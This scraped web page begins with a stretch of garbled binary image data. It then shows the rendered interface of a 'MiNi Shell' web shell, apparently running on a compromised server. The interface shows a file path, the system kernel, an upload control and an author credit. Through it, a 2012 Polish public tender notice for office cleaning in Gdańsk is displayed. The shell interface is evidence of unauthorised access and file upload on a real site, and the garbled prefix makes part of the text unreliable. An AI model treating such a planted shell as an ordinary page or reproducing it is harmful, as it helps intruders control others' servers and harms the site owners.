JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121015/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121015/218903-N-2012.html

<p class="kh_header"><b>Gdańsk: Wykonanie usługi w zakresie sprzątania pomieszczeń biurowych  stanowiących jednostki organizacyjne GZNK SZB</b><br>
<b>Numer ogłoszenia: 218903 - 2012; data zamieszczenia: 15.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gdański Zarząd Nieruchomości Komunalnych - Samorządowy Zakład Budżetowy , ul. Partyzantów 74, 80-254 Gdańsk, woj. pomorskie, tel. 58 3201032, 3200220, 3023282, faks 58 3458235.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gznk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi w zakresie sprzątania pomieszczeń biurowych  stanowiących jednostki organizacyjne GZNK SZB.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiotem zamówienia jest: wykonywanie usługi sprzątania pomieszczeń w 11 obiektach biurowych we wszystkie dni robocze od poniedziałku do piątku.
Ogólna powierzchnia do sprzątania wynosi 5 837,86 m2.<br>
Wykonywanie usług sprzątania odbywać się będzie:<br>
- w obiektach dozorowanych fizycznie przez pracownika ochrony po godzinach pracy,<br>
- w obiektach, w których funkcjonuje elektroniczny monitoring zabezpieczający usługa świadczona będzie w godzinach uzgodnionych z Kierownikiem jednostki. <br>

II. SZCZEGÓŁOWY ZAKRES USŁUG SPRZATANIA<br>
Czynności codziennego sprzątania.<br>
1) w pomieszczeniach biurowych i salach konferencyjnych:<br>
- wycieranie na mokro i na sucho oraz usuwanie plam z mebli biurowych (także z szaf na górze) i sprzętu biurowego, właściwymi do rodzaju sprzątanej powierzchni środkami pielęgnacyjnymi,<br>
- konserwacja mebli biurowych przy użyciu środka pielęgnacyjnego (antystatycznego),<br>
- wycieranie sprzętu AGD i RTV  środkami pielęgnacyjnymi przeznaczonymi RTV (antystatyczne) i AGD,<br>
- mycie na mokro drzwi wraz z klamkami,<br>
- mycie luster środkami przeznaczonymi do mycia luster,<br>
- odkurzanie na sucho wykładziny dywanowej  i podłogowej oraz tapicerki meblowej oraz usuwanie na bieżąco z ich powierzchni plam,<br>
- wycieranie na mokro parapetów, listew odbojowych i listew przypodłogowych,<br>
- opróżnianie i mycie koszy na śmieci i wymiana worków na śmieci,<br>
- mycie powierzchni podłogowych (terakota, gress, tarket),<br>
- czyszczenie zieleni naturalnej i sztucznej,<br>
- podlewanie w miarę potrzeb kwiatów w sekretariacie Zarządu (gabinetach),<br>
2) w toaletach:<br>
- mycie terakoty, glazury, umywalek, baterii umywalkowych środkami przeznaczonymi do czyszczenia i dezynfekcji,<br>
- czyszczenie sedesów i desek sedesowych środkami przeznaczonymi do czyszczenia muszli toaletowych,<br> 
- czyszczenie pisuarów środkami przeznaczonymi do czyszczenia sanitariatów,<br>
- mycie luster, półek i kloszy oświetleniowych,<br>
- bieżące uzupełnianie preparatów dezynfekująco - zapachowych w pomieszczeniach WC oraz w muszlach klozetowych ( środki zapewnia wykonawca),<br>
- bieżące uzupełnianie w toaletach papieru toaletowego, mydła i ręczników jednorazowych (materiał zapewnia zamawiający),<br>
- opróżnianie i mycie pojemników na środki higieny osobistej, koszy na odpadki oraz wymiana worków na śmieci (worki zapewnia wykonawca), <br>
- wycieranie na mokro i sucho drzwi, parapetów, rur środkami właściwymi dla rodzaju sprzątanej powierzchni.<br>
3) w pomieszczeniach ogólnych (klatki schodowe, korytarze, wejścia do budynków, zejścia do piwnic, palarnie):<br>
- wycieranie na mokro i na sucho oraz usuwanie plam z mebli biurowych (także z szaf na górze) i sprzętu biurowego, właściwymi do rodzaju sprzątanej powierzchni środkami pielęgnacyjnymi,<br>
- wycieranie na mokro gaśnic, parapetów, tabliczek informacji wizualnej, listew odbojowych  listew przypodłogowych i listew instalacyjnych,<br>
- zamiatanie podłóg,<br>
- mycie lamperii i drewnianej obudowy,<br>
- mycie powierzchni podłogowych twardych, <br>
- mycie środkami pielęgnacyjnymi do mycia szyb powierzchni szklanych znajdujących się wewnątrz budynku,<br>
- czyszczenie zieleni naturalnej i sztucznej,<br>
- zmywanie na mokro schodów, podestów i barierek odpowiednimi środkami pielęgnacyjnymi,<br>
- opróżnianie popielniczek znajdujących się w miejscach wyznaczonych do palenia,<br>
- mycie drzwi wejściowych (drewnianych i PCV - przeszklonych),<br>
- opróżnianie ziemi, piasku, ewentualnie śniegu spod wycieraczek metalowych znajdujących się przy wejściach do obiektów,<br>
- zamiatanie wejść od budynków, schodów (w okresie zimowym odśnieżanie) - codziennie.<br>
Czynności okresowego  sprzątania.<br> 
- mycie kaloryferów 1 raz w tygodniu,<br>
- odkurzanie ścian (farba emulsyjna) pomieszczeń serwerowni w obiektach 1 raz w tygodniu  w porozumieniu z kierownikiem danej jednostki,<br>
- polimeryzacja podłóg - 2 razy w roku,<br>
- woskowanie podłóg kamiennych i schodów w celu uzyskania wymaganego połysku - 4 razy w roku,<br>
- odkurzanie na mokro wykładzin dywanowych i podłogowych oraz tapicerki meblowej - 1 raz w tygodniu,<br>
- odmrażanie i mycie  lodówek 1 raz na kwartał,<br>
- mycie wszystkich okien (ramy oraz szyby) w tym okna w miejscach trudno dostępnych (klatki schodowe) technologią zaproponowaną przez wykonawcę 2 razy w roku miesiąc marzec i październik (wykaz ilości okien stanowi załącznik nr 2 do siwz),<br>
- odśnieżanie i usuwanie gołoledzi ze schodów i wejść do budynków w okresie zimowym na bieżąco wg potrzeb.<br>
4) Pomieszczenia archiwum  -   zamiatane raz w miesiącu.<br> 
5) Pomieszczenia pomocnicze - sprzątanie raz w tygodniu (powierzchnia pomieszczeń pomocniczych nie jest uwzględniona w powierzchni ogółem do sprzątania określonej w załączniku nr 1 do siwz).<br>
6) Czynności porządkowe w przypadku robót konserwatorskich lub  remontowych w obiektach będą wykonywane tak jak zostały określone w czynnościach codziennego i okresowego sprzątania.<br>
III. Opis przedmiotu zamówienia stanowią:
- wykaz obiektów i ich rodzaj powierzchni do sprzątania  na 2013 r. - załącznik nr 1 do siwz,<br>
- wykaz ilości okien w poszczególnych jednostkach GZNK SZB - załącznik nr 2 do siwz.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.92.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Kwota wadium: 4.000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku posiadania wiedzy i doświadczenia Wykonawca musiał wykonać w okresie ostatnich trzech lat przed upływem terminu składania ofert minimum 2 usługi polegające na zapewnieniu czystości i porządku w budynkach biurowych, obiektach użyteczności publicznej itp. o powierzchni sprzątania minimum 3 000 m2 i poparte dokumentami potwierdzającymi, że usługi te zostały wykonane należycie.<br>
Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia w/w warunek mogą spełniać łącznie.<br>
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków udowadniając, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Wyżej wymienione zobowiązanie musi być złożone w formie oryginału.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca musi wykazać dysponowanie:<br> 
- 1 osobą na stanowisku kierowniczym,<br>
- 13 osobami na stanowisku sprzątaczek/sprzątaczy biurowych.<br>
Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia w/w warunek mogą spełniać łącznie.<br>
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, udowadniając, iż będzie dysponował osobami zdolnymi do wykonania zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania do dyspozycji niezbędnych osób na okres korzystania z nich przy wykonaniu zamówienia. Powyższe zobowiązanie musi być złożone w formie oryginału.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku dotyczącego sytuacji ekonomicznej Wykonawca musi wykazać dysponowanie ubezpieczeniem od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości co najmniej 200 000,00 zł.<br>
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, w/w warunki musi spełniać co najmniej jeden wykonawca.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Złożyć Druk OFERTA, który należy sporządzić wg wzoru druku zamawiającego.<br>
b) Wskazać w złożonej ofercie części zamówienia, których wykonanie powierzy podwykonawcom. W przypadku nie wskazania części zamówienia, które mają być realizowane przez podwykonawców, zamawiający uzna, że całość zamówienia będzie wykonywana przez Wykonawcę osobiście.<br>
c) Załączyć kopię dowodu wpłaty wadium wpłaconego w pieniądzu lub oryginał albo kopię wadium wniesionego w jednej z form określonych w punkcie 12 SIWZ.<br>
d) Złożyć Formularz cenowy, który należy sporządzić wg wzoru druku Zamawiającego.<br>
e) Wykazać, że oferta została podpisana przez osobę(y) uprawnioną(e) do występowania w imieniu i na rzecz Wykonawcy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>tak</p>
<ul class="kh_indent_1" style="text-align: justify;"><li>należy przedłożyć oświadczenie wykonawcy o zatrudnianiu ponad 50% osób niepełnosprawnych w rozumieniu przepisów o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych, lub w rozumieniu właściwych przepisów państw członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego - jeżeli wykonawca ma siedzibę lub miejsce zamieszkania w tych państwach</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Następujące postanowienia umowy mogą ulec zmianie:<br>
a) zmniejszeniu może ulec ilość  obiektów do sprzątania,<br>
b)  stawka podatku od towarów i usług w zakresie dostosowania jej wysokości do  obowiązujących przepisów prawnych.<br>
Zmiany w umowie mogą zostać wprowadzone przy zaistnieniu następujących okoliczności:<br>
a)  zmiany organizacyjne jednostek terenowych Zamawiającego poprzez ich łączenie lub likwidacje,<br>
b)  zmiana stawki podatku VAT może nastąpić w przypadku zmiany obowiązujących przepisów prawnych określonych w ustawie z dnia 11.03.2004 r. o podatku od towarów i usług</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gznk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 80-171 Gdańsk, ul. Cygańska Góra 1, pok. nr 11 w godz. 9:00 - 12:00.<br> 
Cena brutto - 12,30 PLN.<br>
Warunki i sposób płatności: gotówka, zaliczenie pocztowe, przelew.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.10.2012 godzina 10:30, miejsce: siedziba Zamawiającego, 80-171 Gdańsk, ul. Cygańska Góra 1 w pokoju nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 27.11.2012.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> DATA, GODZINA I MIEJSCE OTWARCIA OFERT<br> 
 29.10.2012 r. godzina 10:45, miejsce: siedziba zamawiającego, 80-171 Gdańsk ul. Cygańska Góra 1 w  pokoju nr 6, świetlica<br>
OSOBY UPRAWNIONE DO POROZUMIEWANIA SIĘ Z WYKONAWCAMI<br> 
Marek Skuhra stanowisko służbowe starszy referent ds. zamówień publicznych,<br>
80-171 Gdańsk ul. Cygańska Góra 1, nr pok. 11, tel. (58) 302 32 82.<br>
Adres poczty elektronicznej: skuhra@gznk.pl.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com